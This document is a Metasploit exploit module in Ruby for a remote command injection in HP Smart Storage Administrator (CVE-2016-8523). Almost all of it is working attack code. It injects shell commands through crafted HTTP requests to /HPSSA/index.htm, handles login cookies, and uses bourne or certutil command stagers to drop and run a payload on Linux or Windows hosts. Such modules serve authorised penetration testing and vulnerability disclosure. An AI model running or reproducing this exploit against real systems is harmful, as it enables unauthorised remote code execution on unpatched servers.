HP Smart Storage Administrator 2.30.6.0 - Remote Command Inj

1. require 'msf/core'
2.  
3. class Metasploit3 < Msf::Exploit::Remote
4.   Rank = ExcellentRanking
5.  
6.   include Msf::Exploit::CmdStager
7.   include Msf::Exploit::Remote::HttpClient
8.  
9.   def initialize(info={})
10.     super(update_info(info,
11.       'Name'           => "HP Smart Storage Administrator Remote Command Injection",
12.       'Description'    => %q{
13.         This module exploits a vulnerability found in HP Smart Storage Administrator. By
14.         supplying a specially crafted HTTP request, it is possible to control the
15.         'command' variable in function isDirectFileAccess (found in ipcelmclient.php),
16.         which will be used in a proc_open() function. Versions prior to HP SSA 2.60.18.0 are vulnerable.
17.       },
18.       'License'        => MSF_LICENSE,
19.       'Author'         =>
20.         [
21.           'Nicolas Mattiocco (@MaKyOtOx)'  # Discovery & multi-platform Metasploit module
22.         ],
23.       'References'     =>
24.         [
25.           ['CVE', '2016-8523']
26.         ],
27.       'DefaultOptions' =>
28.         {
29.           'SSL' => true
30.         },
31.       'Platform'       => %w{ linux win },
32.       'Targets'        =>
33.         [
34.           ['Linux', {
35.             'Platform' => 'linux',
36.             'Arch' => ARCH_X86,
37.             'CmdStagerFlavor' => 'bourne'
38.           }],
39.           ['Linux (x64)', {
40.             'Platform' => 'linux',
41.             'Arch' => ARCH_X86_64,
42.             'CmdStagerFlavor' => 'bourne'
43.           }],
44.           ['Windows', {
45.             'Platform' => 'win',
46.             'Arch' => ARCH_X86,
47.             'CmdStagerFlavor' => 'certutil'
48.           }],
49.           ['Windows (x64)', {
50.             'Platform' => 'win',
51.             'Arch' => ARCH_X86_64,
52.             'CmdStagerFlavor' => 'certutil'
53.           }],
54.         ],
55.       'Privileged'     => false,
56.       'DisclosureDate' => "Jan 30 2017"
57.     ))
58.  
59.     register_options(
60.       [
61.         Opt::RPORT(2381),
62.         # USERNAME/PASS may not be necessary, because the anonymous access is possible
63.         OptString.new("USERNAME", [false, 'The username to authenticate as']),
64.         OptString.new("PASSWORD", [false, 'The password to authenticate with'])
65.       ], self.class)
66.   end
67.  
68.   def check
69.  
70.     @cookie = ''
71.  
72.     sig = Rex::Text.rand_text_alpha(8)
73.     cmd = "&echo%20#{sig}&echo"
74.     res = send_command(cmd, true)
75.     if not res
76.       vprint_error("#{peer} - Connection timed out")
77.       return Exploit::CheckCode::Unknown
78.     end
79.  
80.     if res.code == 200 && res.headers.to_s() =~ /#{sig}/
81.       return Exploit::CheckCode::Vulnerable
82.     end
83.  
84.     Exploit::CheckCode::Safe
85.   end
86.  
87.  
88.   def login
89.     username = datastore['USERNAME']
90.     password = datastore['PASSWORD']
91.  
92.     cookie = ''
93.  
94.     res = send_request_cgi({
95.       'method' => 'POST',
96.       'uri'    => '/proxy/ssllogin',
97.       'vars_post' => {
98.         'redirecturl'         => '',
99.         'redirectquerystring' => '',
100.         'user'                => username,
101.         'password'            => password
102.       }
103.     })
104.  
105.     if not res
106.       fail_with(Failure::Unknown, "#{peer} - Connection timed out during login")
107.     end
108.  
109.     # CpqElm-Login: success
110.     if res.headers['CpqElm-Login'].to_s =~ /success/
111.       cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
112.     end
113.  
114.     cookie
115.   end
116.  
117.  
118.   def setup_stager
119.     execute_cmdstager(:temp => './', :linemax => 2800)
120.   end
121.  
122.  
123.   def execute_command(cmd, opts={})
124.     res = send_command(cmd, false)
125.     if res && res.code != 200
126.       vprint_error("Unexpected response:\n#{res}")
127.       fail_with(Failure::Unknown, "There was an unexpected response")
128.     end
129.   end
130.  
131.  
132.   def send_command(cmd, check)
133.     if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty?
134.       @cookie = login
135.       if @cookie.empty?
136.         fail_with(Failure::NoAccess, "#{peer} - Login failed")
137.       else
138.         print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
139.       end
140.     end
141.  
142.     req_opts = {}
143.  
144.     # For the check() function, use GET method
145.     if check
146.       req_opts['uri'] = "/HPSSA/index.htm#{cmd}"
147.       req_opts['method'] = "GET"
148.     else
149.       req_opts['uri'] = "/HPSSA/index.htm"
150.       req_opts['method'] = "POST"
151.       req_opts['vars_post'] = {'msf'=>'red'}
152.       case target.opts['Platform']
153.         when "linux" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"/tmp/")} & echo \""
154.         when "win"   then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"\.\\")} & echo \""
155.       end
156.     end
157.  
158.     unless @cookie.empty?
159.       browser_chk = 'HPSMH-browser-check=done for this session'
160.       curl_loc    = "curlocation-#{datastore['USERNAME']}="
161.       req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
162.     end
163.  
164.     send_request_cgi(req_opts)
165.   end
166.  
167.   def exploit
168.     @cookie = ''
169.  
170.     setup_stager
171.   end
172. end